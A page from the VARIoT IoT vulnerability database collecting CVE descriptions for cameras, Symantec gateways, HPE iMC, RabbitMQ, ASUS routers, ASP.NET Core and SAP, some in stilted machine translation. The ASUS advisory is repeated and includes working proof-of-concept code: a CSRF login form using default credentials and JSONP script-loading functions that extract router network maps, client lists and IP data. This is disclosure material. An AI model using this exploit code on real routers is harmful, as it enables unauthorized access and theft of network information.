VARIoT IoT vulnerabilities database

Client-side enforcement using JavaScript of server-side security options on the Cohu 3960HD allows an attacker to manipulate options sent to the camera and cause malfunction or code execution, as demonstrated by a client-side "if (!passwordsAreEqual())" test. Cohu 3960HD Contains a vulnerability related to failure of the protection mechanism.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Cohu3960HD is an IP zoom camera from Cohu Corporation of the United States and is generally used as a traffic camera. There is code execution leak in the Cohu3960HD. A security vulnerability exists in the Cohu 3960HD

Symantec Advanced Secure Gateway (ASG) 6.6, ASG 6.7 prior to 6.7.2.1, ProxySG 6.5 prior to 6.5.10.6, ProxySG 6.6, and ProxySG 6.7 prior to 6.7.2.1 are susceptible to an open redirection vulnerability. A remote attacker can use a crafted management console URL in a phishing attack to redirect the target user to a malicious web site. multiple Broadcom The product contains an open redirect vulnerability.Information may be obtained and information may be tampered with. Both Symantec ProxySG and AdvancedSecureGateway (ASG) are security gateway devices from Symantec Corporation of the United States. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible

Symantec Advanced Secure Gateway (ASG) 6.6 prior to 6.6.5.13, ASG 6.7 prior to 6.7.3.1, ProxySG 6.5 prior to 6.5.10.6, ProxySG 6.6 prior to 6.6.5.13, and ProxySG 6.7 prior to 6.7.3.1 are susceptible to an information disclosure vulnerability. An attacker with local access to the client host of an authenticated administrator user can, under certain circumstances, obtain sensitive authentication credential information. (DoS) It may be in a state. Both Symantec ProxySG and AdvancedSecureGateway (ASG) are security gateway devices from Symantec Corporation of the United States. A remote attacker can exploit this vulnerability to obtain sensitive information

The Symantec Advanced Secure Gateway (ASG) 6.6 prior to 6.6.5.8, ProxySG 6.5 prior 6.5.10.6, ProxySG 6.6 prior to 6.6.5.8, and ProxySG 6.7 prior to 6.7.1.2 management consoles do not, under certain circumstances, correctly authorize administrator users. A malicious administrator with read-only access can exploit this vulnerability to access management console functionality that requires read-write access privileges. Broadcom of advanced secure gateway and symantec proxysg contains vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. ProxySG and ASG are prone to an authorization-bypass vulnerability. Attackers can exploit this issue to gain unauthorized access and obtain sensitive information or elevate privileges. This may aid in further attacks. The following products are affected: Blue Coat Systems ASG 6.6 prior to 6.6.5.8 is vulnerable. Blue Coat Systems ProxySG 6.5 prior to 6.5.10.6, 6.6 prior to 6.6.5.8, and 6.7 prior to 6.7.1.2 are vulnerable. Symantec ProxySG and Advanced Secure Gateway (ASG) are security gateway devices of Symantec Corporation of the United States. Security vulnerabilities exist in Symantec ProxySG and ASG

A Remote Code Execution vulnerability in HPE Intelligent Management Center (iMC) PLAT version 7.3 E0504P04 was found. Authentication is not required to exploit this vulnerability.The specific flaw exists within the dbman service, which listens on TCP port 2810 by default . The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute arbitrary code under the context of SYSTEM. The RD-305-DIN, MRD-315, MRD-355, and MRD-455 are all Westermo router devices. A number of Westermo routers have a hard-coded password vulnerability, and the device uses a hard-coded private key that allows an attacker to decrypt traffic from any other source. Multiple Westermo Routers are prone to the following security vulnerabilities: 1. A hard-coded credentials vulnerability 2. A cross-site request forgery vulnerability 3. A hard-coded cryptographic key vulnerability Attackers can exploit these issues to bypass authentication mechanisms, to perform unauthorized actions and gain access to the affected application and to read and modify intercepted traffic. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: hpesbhf03745en_us Version: 2 HPESBHF03745 rev.2 - HPE Intelligent Management Center (iMC) PLAT, Remote Code Execution NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. The vulnerabilities could be exploited remotely to allow execution of code. References: - CVE-2017-5816 - CVE-2017-5817 - CVE-2017-5818 - CVE-2017-5819 - CVE-2017-8948 - ZDI-CAN-4368 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2017-5816 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) CVE-2017-5817 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) CVE-2017-5818 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) CVE-2017-5819 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) CVE-2017-8948 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499 Hewlett Packard Enterprise thanks sztivi for working with Trend Micro's Zero Day Initiative (ZDI) for reporting these vulnerabilities to security-alert@hpe.com RESOLUTION HPE has made the following software update available to resolve the vulnerabilities in the iMC PLAT network products listed. + **iMC PLAT - Version: Fixed in IMC PLAT 7.3 E0504P04** * HP Network Products - JD125A HP IMC Std S/W Platform w/100-node - JD126A HP IMC Ent S/W Platform w/100-node - JD808A HP IMC Ent Platform w/100-node License - JD814A HP A-IMC Enterprise Edition Software DVD Media - JD815A HP IMC Std Platform w/100-node License - JD816A HP A-IMC Standard Edition Software DVD Media - JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU - JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU - JF377A HP IMC Std S/W Platform w/100-node Lic - JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU - JF378A HP IMC Ent S/W Platform w/200-node Lic - JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU - JG546AAE HP IMC Basic SW Platform w/50-node E-LTU - JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU - JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU - JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU - JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU - JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU - JG550AAE HPE PCM+ Mobility Manager to IMC Basic WLAN Platform Upgrade 50-node and 150-AP E-LTU - JG590AAE HPE IMC Basic WLAN Manager Software Platform 50 Access Point E-LTU - JG660AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU - JG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU - JG767AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU - JG768AAE HPE PCM+ to IMC Standard Software Platform Upgrade with 200-node E-LTU **Note:** Please contact HPE Technical Support if any assistance is needed acquiring the software updates. HISTORY Version:1 (rev.1) - 11 May 2017 Initial release Version:2 (rev.2) - 26 June 2017 Adding ZDI-CAN-4368 to Security Bulletin. Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBCAAGBQJZUpRjAAoJELXhAxt7SZaitLkH/i5U5+yIRxFll9tO2QRDRKvN JhFxdHfr+T0beKWeLhpcuPcN6vrPsPQ60oyeHzLuz7HhWISSeaU8qIHl44GjTgPM nIyY515SOkAmSFANBYR5CaXSv9NxuxN//qe5MDb9sJbCHoWkrvKJ8eorX0Pi4OWC yqlmq3b1Visj8AfVX5cYGToFLwmCgbz3Q2zUYKlNNvWSfZVY15Fk931xtimHbEZF 3uHNfOXH9CL9HhKTLyuCwmJYK2zCjNlVdICDRqO12ISzffAYl7JdMGk22EXd5BCx fOLnkISEYINImOnqI8pBuIWLO0IH12cYBxutInnGJYsR2d9hTObEh1XO373sgmo= =TkVL -----END PGP SIGNATURE-----

An issue was discovered in these Pivotal RabbitMQ versions: all 3.4.x versions, all 3.5.x versions, and 3.6.x versions prior to 3.6.9; and these RabbitMQ for PCF versions: all 1.5.x versions, 1.6.x versions prior to 1.6.18, and 1.7.x versions prior to 1.7.15. Several forms in the RabbitMQ management UI are vulnerable to XSS attacks. Pivotal RabbitMQ Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Pivotal RabbitMQ products are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks

An issue was discovered in these Pivotal RabbitMQ versions: all 3.4.x versions, all 3.5.x versions, and 3.6.x versions prior to 3.6.9; and these RabbitMQ for PCF versions: all 1.5.x versions, 1.6.x versions prior to 1.6.18, and 1.7.x versions prior to 1.7.15. Several forms in the RabbitMQ management UI are vulnerable to XSS attacks. Pivotal RabbitMQ Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks

ASUS RT-AC* and RT-N* devices with firmware before 3.0.0.4.380.7378 have Login Page CSRF and Save Settings CSRF. ASUS RT-AC* and RT-N* The device firmware contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC* and RT-N* are both ASUS wireless router products. A cross-site request forgery vulnerability exists in versions prior to ASUSRT-AC* and RT-N*3.0.0.4.380.7378 that can be exploited by remote attackers to perform unauthorized operations. [Original post here: https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/] Summary Various models of ASUS RT routers have several CSRF vulnerabilities allowing malicious sites to login and change settings in the router; multiple JSONP vulnerabilities allowing exfiltration of router data and an XML endpoint revealing WiFi passwords. Most of these issues have been fixed by Asus in the March 2017 firmware update under v3.0.0.4.380.7378. One issue (JSONP information disclosure) remains unfixed since the vendor doesn't consider it to be a security threat. CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892 to cover the non-CSRF issues. Vulnerability Details RT routers from ASUS like many other routers come with a built-in web interface accessible over the local network but normally not accessible via the Internet. We discovered multiple issues within that web interface that would can facilitate attacks on the router either via a malicious site visited by a user on the same network, or a malicious mobile or desktop application running on the same network. For the CSRF vulnerabilities, a user would need to visit a malicious site which can try to login and change settings. For the JSONP vulnerabilities, a website can load the JSONP endpoints via SCRIPT tags as long as matching function name is defined on that site. The XML endpoint requires a mobile or desktop application to exploit. NOTE: all of these assume that the attacker knows the local IP address of the router. This could probably be guessed or be determined via Javascript APIs like WebRTC. For desktop and mobile applications, determination of the gateway address should be trivial to implement. Issue #1 - Login Page CSRF The login page for the router doesn't have any kind of CSRF protection, thus allowing a malicious website to submit a login request to the router without the user's knowledge. Obviously, this only works if the site either knows the username and password of the router OR the user hasn't changed the default credentials ("admin / admin"). To exploit, submit the base-64 encoded username and password as "login_authorization" form post, to the "/login.cgi" URL of the browser. Example of a form that can exploit this issue (uses default credentials): <form action="http://192.168.1.1/login.cgi" method="post" target="_blank"> <input name="login_authorization" type="text" value="YWRtaW46YWRtaW4=" /> <input type="submit" /></form> Issue #2 - Save Settings CSRF The various pages within the interface that can save settings do not have CSRF protection. That means that a malicious site, once logged in as described above would be able to change any settings in the router without the user's knowledge. NOTE: We have not been to exploit this issue consistently Issue #3 - JSONP Information Disclosure Without Login Two JSONP endpoints exist within the router which allow detection of which ASUS router is running and some information disclosure. No login is required to the router. The vendor doesn't consider these endpoints a security threat. The endpoints are as follows: /findasus.json Returns the router model name, SSID name and the local IP address of the router iAmAlive([{model?Name: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}]) /httpd_check.json Returns: {"alive": 1, "isdomain": 0} Exploit code as follows: function iAmAlive(payload) { window.alert("Result returned: " + JSON.stringify(payload)); } function alert1() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/findasus.json' document.getElementsByTagName('head')[0].appendChild(script); } function alert2() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/httpd_check.json' document.getElementsByTagName('head')[0].appendChild(script); } Issue #4 - JSONP Information Disclosure, Login Required There exist multiple JSONP endpoints within the router interface that reveal various data from the router including. Below is a list of endpoints and exploit code: /status.asp - Network Information function getstatus() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/status.asp' document.getElementsByTagName('head')[0].appendChild(script); } function show_wanlink_info() { var obj = {}; obj.status = wanlink_status(); obj.statusstr = wanlink_statusstr(); obj.wanlink_type = wanlink_type(); obj.wanlink_ipaddr = wanlink_ipaddr(); obj.wanlink_xdns = wanlink_xdns(); window.alert(JSON.stringify(obj)); } <br/> <button onClick="getstatus()">Load Status script</button> <button onClick="show_wanlink_info()">Show wanlink info</button> <br/><br/> /wds_aplist_2g.asp - Surrounding Access points, 2.4 Ghz band /wds_aplist_5g.asp - Surrounding Access points, 5 Ghz band function getwds_2g() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/wds_aplist_2g.asp' document.getElementsByTagName('head')[0].appendChild(script); } function getwds_5g() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/wds_aplist_5g.asp' document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getwds_2g()">Load 2G info</button> <button onClick="getwds_5g()">Load 5G info</button> <button onClick="window.alert(JSON.stringify(wds_aplist))">Show AP info</button> <br/><br/> /update_networkmapd.asp - Network map of devices on the network function getmap() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/update_networkmapd.asp' document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getmap()">Load Network map</button> <button onClick="window.alert(JSON.stringify(fromNetworkmapd))">Show Map</button> <br/><br/> /update_clients.asp - Origin data function getorigin() { originData = []; var script = document.createElement('script'); script.src = 'http://192.168.1.1/update_clients.asp' document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getorigin()">Load Origin</button> <button onClick="window.alert(JSON.stringify(originData))">Show Origin</button> /get_real_ip.asp - External IP address function getrealip() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/get_real_ip.asp' document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getrealip()">Load IP</button> <button onClick="window.alert(JSON.stringify(wan0_realip_ip))">Show IP</button> /get_webdavInfo.asp - WebDAV information function getwebdav() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/get_webdavInfo.asp'; document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getwebdav()">Load WebDav</button> <button onClick="window.alert(JSON.stringify(pktInfo))">Show Info 1</button> <button onClick="window.alert(JSON.stringify(webdavInfo))">Show Info 1</button> <br/><br/> Issue #5 - XML Endpoint Reveals WiFi Passwords An XML endpoint exists in the router which reveals the WiFi password to the router but to fully exploit this issue, it would require a mobile or desktop application running on the local network since XML cannot be loaded cross origin in the browser. This endpoint can be accessed at the following URL and requires login: [router IP]/WPS_info.xml Mitigation Steps / Vendor Response Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher. There is no mitigation available for the issue #3 - JSONP information disclosure without login. Affected models include the following ASUS routers: RT-AC55U RT-AC56R RT-AC56S RT-AC56U RT-AC66U RT-AC88U RT-AC66R RT-AC66U RT-AC66W RT-AC68W RT-AC68P RT-AC68R RT-AC68U RT-AC87R RT-AC87U RT-AC51U RT-AC53U RT-AC1900P RT-AC3100 RT-AC3200 RT-AC5300 RT-N11P RT-N12 (D1 version only) RT-N12+ RT-N12E RT-N18U RT-N56U RT-N66R RT-N66U (B1 version only) RT-N66W References CVE-IDs: CVE-2017-5891 and CVE-2017-5892 CERT/CC Tracking # VR-627 Credits We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich. Timeline 2017-01-21: Initial contact with the vendor 2017-01-23: Initial contact with CERT/CC 2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested 2017-02-10: Vulnerability analysis received from the vendor 2017-02-12: Beta firmware provided by the firmware to test fixes 2017-02-12: Vendor fixes confirmed 2017-03-31: Fixed firmware released publicly by the vendor 2017-05-01: Draft advisory shared with the vendor and CERT/CC 2017-05-09: Public disclosure

ASUS RT-AC* and RT-N* devices with firmware before 3.0.0.4.380.7378 allow JSONP Information Disclosure such as a network map. ASUS RT-AC* and RT-N* are two router products. Attackers can exploit vulnerabilities to obtain sensitive information. [Original post here: https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/] Summary Various models of ASUS RT routers have several CSRF vulnerabilities allowing malicious sites to login and change settings in the router; multiple JSONP vulnerabilities allowing exfiltration of router data and an XML endpoint revealing WiFi passwords. One issue (JSONP information disclosure) remains unfixed since the vendor doesn't consider it to be a security threat. CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892 to cover the non-CSRF issues. Vulnerability Details RT routers from ASUS like many other routers come with a built-in web interface accessible over the local network but normally not accessible via the Internet. We discovered multiple issues within that web interface that would can facilitate attacks on the router either via a malicious site visited by a user on the same network, or a malicious mobile or desktop application running on the same network. For the CSRF vulnerabilities, a user would need to visit a malicious site which can try to login and change settings. For the JSONP vulnerabilities, a website can load the JSONP endpoints via SCRIPT tags as long as matching function name is defined on that site. The XML endpoint requires a mobile or desktop application to exploit. NOTE: all of these assume that the attacker knows the local IP address of the router. This could probably be guessed or be determined via Javascript APIs like WebRTC. For desktop and mobile applications, determination of the gateway address should be trivial to implement. Issue #1 - Login Page CSRF The login page for the router doesn't have any kind of CSRF protection, thus allowing a malicious website to submit a login request to the router without the user's knowledge. Obviously, this only works if the site either knows the username and password of the router OR the user hasn't changed the default credentials ("admin / admin"). To exploit, submit the base-64 encoded username and password as "login_authorization" form post, to the "/login.cgi" URL of the browser. Example of a form that can exploit this issue (uses default credentials): <form action="http://192.168.1.1/login.cgi" method="post" target="_blank"> <input name="login_authorization" type="text" value="YWRtaW46YWRtaW4=" /> <input type="submit" /></form> Issue #2 - Save Settings CSRF The various pages within the interface that can save settings do not have CSRF protection. That means that a malicious site, once logged in as described above would be able to change any settings in the router without the user's knowledge. No login is required to the router. The vendor doesn't consider these endpoints a security threat. The endpoints are as follows: /findasus.json Returns the router model name, SSID name and the local IP address of the router iAmAlive([{model?Name: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}]) /httpd_check.json Returns: {"alive": 1, "isdomain": 0} Exploit code as follows: function iAmAlive(payload) { window.alert("Result returned: " + JSON.stringify(payload)); } function alert1() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/findasus.json' document.getElementsByTagName('head')[0].appendChild(script); } function alert2() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/httpd_check.json' document.getElementsByTagName('head')[0].appendChild(script); } Issue #4 - JSONP Information Disclosure, Login Required There exist multiple JSONP endpoints within the router interface that reveal various data from the router including. Below is a list of endpoints and exploit code: /status.asp - Network Information function getstatus() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/status.asp' document.getElementsByTagName('head')[0].appendChild(script); } function show_wanlink_info() { var obj = {}; obj.status = wanlink_status(); obj.statusstr = wanlink_statusstr(); obj.wanlink_type = wanlink_type(); obj.wanlink_ipaddr = wanlink_ipaddr(); obj.wanlink_xdns = wanlink_xdns(); window.alert(JSON.stringify(obj)); } <br/> <button onClick="getstatus()">Load Status script</button> <button onClick="show_wanlink_info()">Show wanlink info</button> <br/><br/> /wds_aplist_2g.asp - Surrounding Access points, 2.4 Ghz band /wds_aplist_5g.asp - Surrounding Access points, 5 Ghz band function getwds_2g() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/wds_aplist_2g.asp' document.getElementsByTagName('head')[0].appendChild(script); } function getwds_5g() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/wds_aplist_5g.asp' document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getwds_2g()">Load 2G info</button> <button onClick="getwds_5g()">Load 5G info</button> <button onClick="window.alert(JSON.stringify(wds_aplist))">Show AP info</button> <br/><br/> /update_networkmapd.asp - Network map of devices on the network function getmap() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/update_networkmapd.asp' document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getmap()">Load Network map</button> <button onClick="window.alert(JSON.stringify(fromNetworkmapd))">Show Map</button> <br/><br/> /update_clients.asp - Origin data function getorigin() { originData = []; var script = document.createElement('script'); script.src = 'http://192.168.1.1/update_clients.asp' document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getorigin()">Load Origin</button> <button onClick="window.alert(JSON.stringify(originData))">Show Origin</button> /get_real_ip.asp - External IP address function getrealip() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/get_real_ip.asp' document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getrealip()">Load IP</button> <button onClick="window.alert(JSON.stringify(wan0_realip_ip))">Show IP</button> /get_webdavInfo.asp - WebDAV information function getwebdav() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/get_webdavInfo.asp'; document.getElementsByTagName('head')[0].appendChild(script); } <br/> <button onClick="getwebdav()">Load WebDav</button> <button onClick="window.alert(JSON.stringify(pktInfo))">Show Info 1</button> <button onClick="window.alert(JSON.stringify(webdavInfo))">Show Info 1</button> <br/><br/> Issue #5 - XML Endpoint Reveals WiFi Passwords An XML endpoint exists in the router which reveals the WiFi password to the router but to fully exploit this issue, it would require a mobile or desktop application running on the local network since XML cannot be loaded cross origin in the browser. This endpoint can be accessed at the following URL and requires login: [router IP]/WPS_info.xml Mitigation Steps / Vendor Response Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher. Affected models include the following ASUS routers: RT-AC55U RT-AC56R RT-AC56S RT-AC56U RT-AC66U RT-AC88U RT-AC66R RT-AC66U RT-AC66W RT-AC68W RT-AC68P RT-AC68R RT-AC68U RT-AC87R RT-AC87U RT-AC51U RT-AC53U RT-AC1900P RT-AC3100 RT-AC3200 RT-AC5300 RT-N11P RT-N12 (D1 version only) RT-N12+ RT-N12E RT-N18U RT-N56U RT-N66R RT-N66U (B1 version only) RT-N66W References CVE-IDs: CVE-2017-5891 and CVE-2017-5892 CERT/CC Tracking # VR-627 Credits We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich. Timeline 2017-01-21: Initial contact with the vendor 2017-01-23: Initial contact with CERT/CC 2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested 2017-02-10: Vulnerability analysis received from the vendor 2017-02-12: Beta firmware provided by the firmware to test fixes 2017-02-12: Vendor fixes confirmed 2017-03-31: Fixed firmware released publicly by the vendor 2017-05-01: Draft advisory shared with the vendor and CERT/CC 2017-05-09: Public disclosure

A potential security vulnerability has been identified with HP Web Jetadmin before 10.4 SR2. This vulnerability could potentially be exploited to create a denial of service. HP Web Jetadmin Contains a resource management vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HPWebJetadmin is a web-based print management solution that remotely configures, monitors, and diagnoses network printers

A denial of service vulnerability exists when the ASP.NET Core fails to properly validate web requests. NOTE: Microsoft has not commented on third-party claims that the issue is that the TextEncoder.EncodeCore function in the System.Text.Encodings.Web package in ASP.NET Core Mvc before 1.0.4 and 1.1.x before 1.1.3 allows remote attackers to cause a denial of service by leveraging failure to properly calculate the length of 4-byte characters in the Unicode Non-Character range. Microsoft ASP.NET Core Contains an input validation vulnerability.Information may be tampered with. The framework is used to build cloud-based applications such as web applications, IoT applications, and mobile backends. An attacker can use this vulnerability to cause a denial of service

An elevation of privilege vulnerability exists when the ASP.NET Core fails to properly sanitize web requests. Microsoft ASP.NET Core Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. Microsoft ASP.NET Core is a cross-platform open source framework of Microsoft Corporation. The framework is used to build cloud-based applications such as web applications, IoT applications, and mobile backends. An attacker can use this vulnerability to gain access

A spoofing vulnerability exists when the ASP.NET Core fails to properly sanitize web requests. Microsoft ASP.NET Core Contains an input validation vulnerability.Information may be tampered with. The framework is used to build cloud-based applications such as web applications, IoT applications, and mobile backends. Attackers can use this vulnerability to forge requests. An attacker can exploit this issue to conduct spoofing attacks and perform unauthorized actions; other attacks are also possible

In F5 BIG-IP 11.2.1, 11.4.0 through 11.6.1, and 12.0.0 through 12.1.2, an unauthenticated user with access to the control plane may be able to delete arbitrary files through an undisclosed mechanism. plural F5 BIG-IP The product contains vulnerabilities related to authorization, permissions, and access control.Information may be tampered with. Multiple F5 BIG-IP Products are prone to a security-bypass vulnerability. Successfully exploiting this issue may allow attackers to perform unauthorized actions. This may lead to other attacks. F5 BIG-IP is an all-in-one network device integrated with network traffic management, application security management, load balancing and other functions from F5 Corporation of the United States. An attacker could exploit this vulnerability to delete arbitrary files. The following versions are affected: F5 BIG-IP Version 11.2.1, Version 11.4.0 to Version 11.6.1, Version 12.0.0 to Version 12.1.2

ASUS RT-AC* and RT-N* devices with firmware through 3.0.0.4.380.7378 allow JSONP Information Disclosure such as the SSID. ASUSRT-AC* and RT-N* are two router products. Attackers can exploit vulnerabilities to obtain sensitive information

ASUS RT-AC* and RT-N* devices with firmware before 3.0.0.4.380.7378 allow remote authenticated users to discover the Wi-Fi password via WPS_info.xml. ASUSRT-AC* and RT-N* are two router products. An information disclosure vulnerability exists in ASUSRT-AC* and RT-N* (pre-3.0.0.4.380.7378 firmware). Attackers can exploit vulnerabilities to obtain sensitive information. ASUS RT-AC* and RT-N* devices using firmware versions earlier than 3.0.0.4.380.7378 have a security vulnerability

A vulnerability in Cisco WebEx Meetings Server could allow unauthenticated, remote attackers to gain information that could allow them to access scheduled customer meetings. The vulnerability is due to an incomplete configuration of the robots.txt file on customer-hosted WebEx solutions and occurs when the Short URL functionality is not activated. All releases of Cisco WebEx Meetings Server later than release 2.5MR4 provide this functionality. An attacker could exploit this vulnerability via an exposed parameter to search for indexed meeting information. A successful exploit could allow the attacker to obtain scheduled meeting information and potentially allow the attacker to attend scheduled, customer meetings. This vulnerability affects the following releases of Cisco WebEx Meetings Server: 2.5, 2.6, 2.7, 2.8. Cisco Bug IDs: CSCve25950. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution. An information disclosure vulnerability exists in CWMS

SAP GUI is prone to a security-bypass vulnerability. Remote attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.

SAP Enterprise Portal is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.